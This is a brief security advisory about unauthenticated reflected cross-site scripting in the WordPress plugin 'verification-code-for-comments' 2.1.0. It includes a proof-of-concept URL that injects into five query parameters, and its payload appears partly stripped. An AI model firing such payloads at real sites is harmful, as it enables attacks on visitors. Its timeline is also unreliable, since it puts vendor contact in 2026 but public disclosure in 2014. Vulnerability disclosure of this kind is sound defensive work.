wp-plugin : verification-code-for-comments – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : verification-code-for-comments

 

Effected Version : 2.1.0 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wp-content/plugins/verification-code-for-comments/vcc.js.php?vp=vp’>// &vs=vs’>// &l=l’>// &vu=vu’>// &vm=vm’>// &

 

Vulnerable Parameters : vp,vs,l,vu,vm

 

Disclosure Timeline

 

Vendor Contacted : 2026-01-15

 
Plugin Status : Closed
 
Public Disclosure : June 12, 2014
 
CVE Number : CVE-2014-4565

 
Plugin Description :
 
Add an verification code when user posting a comment to keep robots away. You can use an image verification code or a math equation instead.

Robots may post lots of spam comments into your database. You can add a verification code image or a math equation to avoid this.

Features:

* You can choose a verification code image or a math equation as you wish
* You don't need to edit any source code of WP, you just need to active the plugin

Leave a Reply

Your email address will not be published. Required fields are marked *